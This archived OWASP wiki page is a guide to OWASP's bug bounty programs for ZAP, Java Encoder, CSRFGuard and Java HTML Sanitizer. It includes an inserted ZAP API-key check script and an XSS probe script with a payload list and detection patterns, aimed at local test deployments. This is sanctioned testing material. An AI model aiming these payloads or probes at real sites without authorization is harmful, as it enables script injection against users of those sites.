This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "Get Started with OWASP Bug Bounty"

From OWASP

Latest revision as of 19:31, 19 September 2016

OWASP Bug Bounty programs are run differently from most traditional bug bounties. First of all, the applications to be tested are not available online as deployed web applications. Instead, you will need to download each application and deploy or install it on your own machine. The following is a guideline for each bug bounty program we are running:

OWASP ZAP Bug Bounty

The OWASP ZAP Bug Bounty program can be found here: https://bugcrowd.com/owaspzap

OWASP ZAP is a desktop client application written in Java, not a hosted web application, so it is important that you keep the scope of the bounty in mind. Download the version named in the scope (2.5.0) and install it on your computer: https://github.com/zaproxy/zaproxy/wiki/Downloads

Bug Bounty Tips

Check the code

OWASP ZAP is an open source application, meaning that you have access to the source code and can debug it while you test it. This gives you a much better view of what is happening, and it also lets you white-box test the application and find vulnerable Java methods faster than a black-box approach would.

  • You will need to run ZAP from within a Java IDE such as Eclipse. The easiest way to get ZAP running this way is to follow the build instructions here: https://github.com/zaproxy/zaproxy/wiki/Building or to follow these video walkthroughs:
    https://www.youtube.com/watch?v=1UsH1jSnE3c
    https://www.youtube.com/watch?v=qhm1g1klyas
    https://www.youtube.com/watch?v=xevZ7n7ETMI
    https://www.youtube.com/watch?v=n9mQASWRcps
  • You can also use static analysis (SAST) tools, which may point you to vulnerable methods.

The ZAP source code can be found here: https://github.com/zaproxy/zaproxy/

Scope

Any design or implementation issue that is reproducible and substantially affects the security of ZAP users is likely to be in scope for the program, but in particular:

  • Remote code execution [1]
  • Unauthorized API actions [1]
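The "unauthorized API actions" item above is about ZAP's own REST API, which the desktop application exposes on its proxy address. A first check a tester will want is whether a keyless request to the API is answered at all. The script below is an added example, not ZAP project code; it assumes ZAP 2.5.0 is listening on 127.0.0.1:8080 (its default proxy address), that any configured API key is exported as ZAP_API_KEY, and that the read-only core/view/version endpoint returns a JSON object containing a "version" member. It only calls a view; a keyless view call succeeding is a lead to then try action endpoints in the same way, not a finding on its own, and you should confirm how the in-scope version is configured by default before reporting anything.

```python
"""Check whether a running ZAP instance enforces its API key.

Added example, not ZAP project code. Assumptions (not from the wiki page):
ZAP 2.5.0 is running on 127.0.0.1:8080 (its default proxy address) and, if
an API key is configured, it is exported in the ZAP_API_KEY environment
variable. Only the read-only 'core/view/version' endpoint is called.
"""
import json
import os
import urllib.error
import urllib.parse
import urllib.request

ZAP_BASE = "http://127.0.0.1:8080"   # assumed ZAP address


def api_url(component, kind, name, params=None, base=ZAP_BASE):
    """Build a ZAP REST URL: <base>/JSON/<component>/<kind>/<name>/?k=v."""
    query = "?" + urllib.parse.urlencode(params) if params else ""
    return f"{base}/JSON/{component}/{kind}/{name}/{query}"


def classify(status, body):
    """Interpret one response to a call made without the API key.

    'open'     - the view returned its JSON payload, so the API answered a
                 keyless request (assumed response shape: the version view
                 returns a JSON object with a "version" member).
    'enforced' - ZAP refused the call with a 4xx status.
    'unknown'  - anything else (ZAP not running, unexpected body).
    """
    if status == 200:
        try:
            data = json.loads(body)
        except ValueError:
            return "unknown"
        if isinstance(data, dict) and "version" in data:
            return "open"
        return "unknown"
    if 400 <= status < 500:
        return "enforced"
    return "unknown"


def fetch(url, timeout=5):
    """GET a URL and return (status, body); HTTP errors are still responses."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")
    except urllib.error.URLError:
        return 0, ""   # nothing listening, or connection refused


def check_api_key_enforcement(base=ZAP_BASE, key=None):
    """Return (result_without_key, result_with_key) for the version view."""
    if key is None:
        key = os.environ.get("ZAP_API_KEY", "")
    no_key = classify(*fetch(api_url("core", "view", "version", base=base)))
    with_key = classify(*fetch(api_url("core", "view", "version",
                                       {"apikey": key}, base=base)))
    return no_key, with_key


if __name__ == "__main__":
    no_key, with_key = check_api_key_enforcement()
    print(f"without key: {no_key}; with key: {with_key}")
    if with_key != "open":
        print("ZAP did not answer even with the key: is it running, and is the key right?")
    elif no_key == "open":
        print("a keyless view call succeeded: now try an 'action' call the same way")
    else:
        print("views require the key; repeat against 'action' endpoints before concluding")
```

The second request, made with the key, is there to tell "the API rejected me" apart from "nothing is listening": without it, a stopped ZAP and an enforced key look the same.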

OWASP JAVA Encoder Bug Bounty

This bounty program is to be found here: https://bugcrowd.com/owaspjavaencoder

Please read the scope of the bounty carefully before you start.

How to deploy it

OWASP Java Encoder is a Java library rather than a standalone application. For the purpose of this bounty, the library has been deployed inside a dummy Java web application consisting of a single web form. You can download the WAR file here: https://github.com/OWASP/OWASPBugBounty/tree/master/JavaEncoder/war-files

If you have no experience deploying a WAR file as an application, you can either run it from an IDE such as Eclipse or deploy it to an Apache Tomcat (or similar servlet container) server. The following videos walk through both:

  https://www.youtube.com/watch?v=GBKzjMwQMoQ
  https://www.youtube.com/watch?v=kLgquZ2FiuQ
  https://www.youtube.com/watch?v=9X9DA8oVodk
Bug Bounty Tips

Again, this application is fully open source and you have access to the source code. You can run static analysis (SAST) tools such as FindBugs against it, or debug the application while testing it: https://en.wikipedia.org/wiki/FindBugs

OWASP CSRFGuard Bug Bounty

The OWASP CSRFGuard Bug Bounty program can be found here: https://bugcrowd.com/owaspcrsfguard

Please read the scope of the bounty carefully and make sure you understand the target.

As with the other libraries, for the purpose of this bounty CSRFGuard has been deployed inside a dummy Java web application consisting of a single web form. This time the full source of that application is available; download it here: https://github.com/OWASP/OWASPBugBounty/tree/master/CRSFGuard (bountyguard.zip).

You can open the Maven project in Eclipse IDE for Java Developers: https://www.eclipse.org/downloads/packages/eclipse-ide-java-developers/lunasr2 If you are not familiar with opening Maven projects in Eclipse, watch the following video:

  https://www.youtube.com/watch?v=xWXPJexUPHg

OWASP JAVA HTML Sanitizer Bug Bounty

This bounty program is to be found here: https://bugcrowd.com/owaspjavasanitizer

Please read the scope of the bounty carefully before you start.

How to deploy it

OWASP Java HTML Sanitizer is a Java library rather than a standalone application. For the purpose of this bounty, the library has been deployed inside a dummy Java web application consisting of a single web form. You can download the WAR file here: https://github.com/OWASP/OWASPBugBounty/tree/master/JavaHTMLSanitizer/war-files

If you have no experience deploying a WAR file as an application, you can either run it from an IDE such as Eclipse or deploy it to an Apache Tomcat (or similar servlet container) server. The same videos as for the Java Encoder walk through both:

  https://www.youtube.com/watch?v=GBKzjMwQMoQ
  https://www.youtube.com/watch?v=kLgquZ2FiuQ
  https://www.youtube.com/watch?v=9X9DA8oVodk
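Both the Java Encoder and the Java HTML Sanitizer bounties above put the library behind a one-field web form, so the black-box side of testing is the same for both: submit a corpus of payloads and look at what comes back. The script below is an added example, not code from the OWASPBugBounty repository. It assumes the WAR is reachable at FORM_URL, that the form takes the user text in a POST parameter named FIELD (read the form's HTML and change both; these names are guesses), and that the response page reflects the processed value. It renders the form once with harmless input as a baseline so the dummy application's own scripts are not mistaken for survivors.

```python
"""Black-box probe for the dummy web forms that wrap OWASP Java Encoder and
OWASP Java HTML Sanitizer.

Added example, not code from the OWASPBugBounty repository. Assumptions (not
from the wiki page): the WAR is deployed at FORM_URL, the form submits the
user-controlled text in a POST parameter named FIELD, and the response page
reflects the encoded/sanitised result. Read the form's HTML and adjust both.
"""
import re
import urllib.parse
import urllib.request
from collections import Counter

FORM_URL = "http://127.0.0.1:8080/bounty/"   # assumed deployment URL
FIELD = "input"                              # assumed parameter name

# Constructed payload corpus. Each line targets a different parser quirk an
# encoder or sanitiser must handle: plain tags, event handlers, javascript:
# URLs, foreign (SVG) content, attribute break-out and nested-tag stripping.
PAYLOADS = [
    '<script>alert(1)</script>',
    '<img src=x onerror=alert(1)>',
    '<a href="javascript:alert(1)">x</a>',
    '<svg><script>alert(1)</script></svg>',
    '"><script>alert(1)</script>',
    '<scr<script>ipt>alert(1)</script>',
    '</style><script>alert(1)</script>',
]

# Constructs that execute in a browser if they reach the page unencoded.
EXEC_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),                       # <script ...
    re.compile(r"<[^>]+\son\w+\s*=", re.I),                  # <tag ... onerror=
    re.compile(r"href\s*=\s*['\"]?\s*javascript:", re.I),    # href="javascript:
]


def executable_markup(html):
    """Return every executable construct in a page, grouped by pattern."""
    hits = []
    for pat in EXEC_PATTERNS:
        hits.extend(m.group(0) for m in pat.finditer(html))
    return hits


def new_markup(baseline_html, response_html):
    """Executable constructs in the response beyond those the application's
    own page already contains (baseline = the form rendered with harmless
    input). Counted, not set-based, so an injected <script> next to the app's
    own <script src=...> is still reported."""
    extra = Counter(executable_markup(response_html)) - Counter(executable_markup(baseline_html))
    return sorted(extra.elements())


def submit(payload, url=FORM_URL, field=FIELD):
    """POST one value to the form and return the response body."""
    data = urllib.parse.urlencode({field: payload}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def probe(url=FORM_URL, field=FIELD, payloads=PAYLOADS):
    """Map each payload to (reflected verbatim?, surviving executable markup)."""
    baseline = submit("hello world", url, field)
    results = {}
    for payload in payloads:
        page = submit(payload, url, field)
        results[payload] = (payload in page, new_markup(baseline, page))
    return results


if __name__ == "__main__":
    for payload, (verbatim, hits) in probe().items():
        if hits or verbatim:
            print(f"CHECK {payload!r}: verbatim={verbatim} survived={hits}")
        else:
            print(f"ok    {payload!r}")
```

Read the two columns differently for the two libraries. For the Encoder form a verbatim reflection is already worth chasing, since every `<` and `"` should come back as an entity; for the Sanitizer form, harmless tags such as `<b>` surviving is expected behaviour and only the executable constructs matter. Either way a hit is a candidate to confirm in a browser and then trace through the library source, not a finding by itself.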

Questions

If you have more questions about the program or how to join it, please contact: [email protected]